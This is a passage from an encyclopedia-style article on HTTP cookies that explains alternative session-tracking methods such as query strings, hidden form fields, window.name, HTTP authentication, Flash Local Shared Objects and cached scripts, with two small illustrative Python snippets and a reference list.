Query strings used in this way and cookies are very similar, both being arbitrary pieces of information chosen by the server and sent back by the browser. However, there are some differences: since a query string is part of a URL, if that URL is later reused, the same attached piece of information is sent to the server. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.

Moreover, even if the same user accesses the same page twice, there is no guarantee that the same query string is used in both views. For example, if the user arrives at the page from a page internal to the site the first time and from an external search engine the second time, the respective query strings are typically different, while the cookies would be the same. For more details, see query string.

Other drawbacks of query strings are related to security: storing data that identifies a session in a query string enables or simplifies session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.

Hidden form fields

A form of session tracking, used by ASP.NET, is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks; and if the form is handled with the HTTP GET method, the fields actually become part of the URL the browser will send upon form submission. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie.

This approach presents two advantages from the point of view of the tracker: first, having the tracking information placed in the HTML source and POST input rather than in the URL means it will not be noticed by the average user; second, the session information is not copied when the user copies the URL (to save the page on disk or send it via email, for example).
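A server-generated form carrying the session information in a hidden field could be produced roughly as follows. This is a minimal sketch: render_form and the field name session_id are hypothetical, and it does not reproduce the markup that ASP.NET itself generates.

```python
import html


def render_form(action: str, session_id: str) -> str:
    """Return an HTML form that posts the session ID back in a hidden field."""
    return (
        f'<form method="post" action="{html.escape(action, quote=True)}">\n'
        f'  <input type="hidden" name="session_id" '
        f'value="{html.escape(session_id, quote=True)}">\n'
        '  <input type="submit" value="Continue">\n'
        "</form>"
    )


form = render_form("/checkout", "abc123")
print(form)
```

With method="post" the identifier travels in the request body, so it appears neither in the address bar nor in a copied URL.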

window.name

All current web browsers can store a fairly large amount of data (2-32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies and is also cross-domain. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables[38] on the client side.

The downside is that every separate window or tab will initially have an empty window.name; in times of tabbed browsing this means that individually opened tabs (initiation by user) will not have a window name. Furthermore, window.name can be used for tracking visitors across different web sites, making it of concern for Internet privacy.

In some respects this can be more secure than cookies because it does not involve the server, so it is not vulnerable to network cookie sniffing attacks. However, if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different web sites opened in the same window or tab.

HTTP authentication

The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a Web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
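For basic access authentication, the header the browser repeats on each request can be reproduced in a few lines. The function name basic_auth_header is hypothetical; the username and password are the well-known sample values used in the HTTP specifications.

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization header line used by basic access authentication."""
    credentials = f"{username}:{password}".encode("utf-8")
    # Base64 is an encoding, not encryption: anyone who sees the header
    # can decode the username and password.
    return "Authorization: Basic " + base64.b64encode(credentials).decode("ascii")


print(basic_auth_header("Aladdin", "open sesame"))
# prints "Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ=="
```

Since the same value is sent with every request to the protected area, the server can recognise the user across requests much as it would with a cookie.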

Adobe Flash Local Shared Objects

If a browser includes the Adobe Flash Player plugin (formerly developed by Macromedia), the Local Shared Objects functionality can be used in a way very similar to cookies. Local Shared Objects may be an attractive choice to web developers because a majority of Windows users have Flash Player installed, the default size limit is 100 kB, and the security controls are distinct from the user controls for cookies, so Local Shared Objects may be enabled when cookies are not.

In some cases, web sites have created Flash LSOs that behave differently from what a user has specified for HTTP cookies, which has raised concern that web sites need to specify a consistent privacy policy across different types of cookies.[39]

The major drawback of this approach is the same as that of every platform- or vendor-specific approach: it breaks the web's global accessibility and interoperability. It ties web development to a specific client platform and excludes users of standards-compliant web user agents, forcing them to use platform- or vendor-specific agents instead, which perpetuates vendor lock-in.

Client-side persistence

Some web browsers support a script-based persistence mechanism that allows the page to store information locally for later retrieval. Internet Explorer, for example, supports persisting information in the browser's history, in favorites, in an XML store, or directly within a Web page saved to disk.[40] With HTML 5 there will be a DOM Storage (localStorage) method, currently supported by only some browsers. For Internet Explorer 5+ there is a userdata method[41] available through DHTML Behaviours.

A different mechanism relies on browsers normally caching (holding in memory instead of reloading) JavaScript programs used in web pages. As an example, a page may contain a script element such as <script type="text/javascript" src="example.js">. The first time this page is loaded, the program example.js is loaded as well. At this point, the program remains cached and is not reloaded the second time the page is visited. As a result, if this program contains a statement such as id=3243242 (setting a global variable), this identifier remains valid and can be exploited by other JavaScript code the next time the page, or another page linking the same program, is loaded.[citation needed] The major drawback of this method is that the global JavaScript variable must be static, meaning that it cannot be changed or deleted persistently like a cookie.

References

  1. ^ John Schwartz. Giving the Web a memory cost its users privacy. New York Times. September 4, 2001
  2. ^ a b Jey Kesan and Rajiv Shah. SSRN.com, Deconstructing Code. Chapter II.B (Netscape's cookies). Yale Journal of Law and Technology, 6, 277–389.
  3. ^ a b David Kristol. HTTP Cookies: Standards, privacy, and politics. ACM Transactions on Internet Technology, 1(2), 151–198, 2001. doi:10.1145/502152.502153
  4. ^ Press Release: Netscape Communications Offers New Network Navigator Free On The Internet
  5. ^ Usenet Post by Marc Andreessen: Here it is, world!
  6. ^ Hardmeier, Sandi (2005-08-25). "The history of Internet Explorer". Microsoft. Retrieved 2009-01-04.
  7. ^ Roger Clarke. Cookies
  8. ^ "Persistent client state HTTP cookies: Preliminary specification". Netscape. c1999. Archived from the original on 2007-08-05.
  9. ^ RFC 2965 - HTTP State Management Mechanism (IETF)
  10. ^ "Cookie Property". MSDN. Microsoft. Retrieved 2009-01-04.
  11. ^ Shannon, Ross (2007-02-26). "Cookies - set and retrieve information about your readers". HTMLSource. Retrieved 2009-01-04.
  12. ^ "Contrary to popular belief, cookies are good for you! (on the Internet)". The All I Need. Retrieved 2009-01-04.
  13. ^ Keith C. Ivey Untangling the Web Cookies: Just a Little Data Snack. 1998
  14. ^ "I-034: Internet Cookies". CIAC, United States Department of Energy (ciac.org). March 12, 1998, revised February 1, 2007. Retrieved 2007-11-05.
  15. ^ Brian Quinton. Study: Users Don't Understand, Can’t Delete Cookies. Direct. May 18, 2005
  16. ^ Adam Penenberg. Cookie Monsters. Slate, November 7, 2005
  17. ^ Whalen, David (06/08/2002). "The Unofficial Cookie FAQ". 2.6. Cookie Central. Retrieved 2009-01-04.
  18. ^ "How to Manage Cookies in Internet Explorer 6". Microsoft. December 18, 2007. Retrieved 2009-01-04.
  19. ^ "Clearing private data". Firefox Support Knowledge base. Mozilla. 16 September, 2008. Retrieved 2009-01-04.
  20. ^ "Clear Personal Information : Clear browsing data". Google Chrome Help. Google. Retrieved 2009-01-04.
  21. ^ "Clear Personal Information: Delete cookies". Google Chrome Help. Google. Retrieved 2009-01-04.
  22. ^ CBS News. CIA Caught Sneaking Cookies. March 20, 2002.
  23. ^ The Associated Press. Spy Agency Removes Illegal Tracking Files. December 29, 2005
  24. ^ "Guichett - 32002L0058 -". eur-lex.europa.eu. Retrieved 2009-02-18.
  25. ^ "Cookie Settings for Opera 9". OperaWiki.info. Retrieved 2008-01-20.
  26. ^ Pegoraro, Rob (July 17, 2005). "How to Block Tracking Cookies". Washington Post. p. F07. Retrieved 2009-01-04.
  27. ^ Taco.Dubfire.net, TACO, the Targeted Advertising Cookie Opt-Out Firefox extension
  28. ^ Tilkov, Stefan (July 02, 2008). "REST Anti-Patterns". InfoQ. Retrieved 2009-01-04.
  29. ^ HTTP State Management.
  30. ^ "Warning of webmail wi-fi hijack". BBC News. August 3, 2007.
  31. ^ "Can you show me what XSS cookie theft looks like?" (excerpt from the Cgisecurity Cross-Site Scripting FAQ).
  32. ^ a b Microsoft, Mitigating Cross-site Scripting With HTTP-only Cookies.
  33. ^ "Who developed HTTPOnly? When?". OWASP. Retrieved 2009-01-04.
  34. ^ "Session set cookie params". PHP Manual. PHP. Retrieved 2009-01-04.
  35. ^ Microsoft, Defend Your Code with Top Ten Security Tips Every Developer Must Know.
  36. ^ "Browsers Supporting HTTPOnly". OWASP. Retrieved 2009-01-04.
  37. ^ "Google expires cookies sooner in minor privacy concession". Cnet. June 16, 2007. Retrieved 2007-11-07.
  38. ^ ThomasFrank.se
  39. ^ SSRN.com
  40. ^ Introduction to Persistence, MSDN
  41. ^ Microsoft.com

This article is based on material taken from the Free On-line Dictionary of Computing prior to 1 November 2008 and incorporated under the "relicensing" terms of the GFDL, version 1.3 or later.
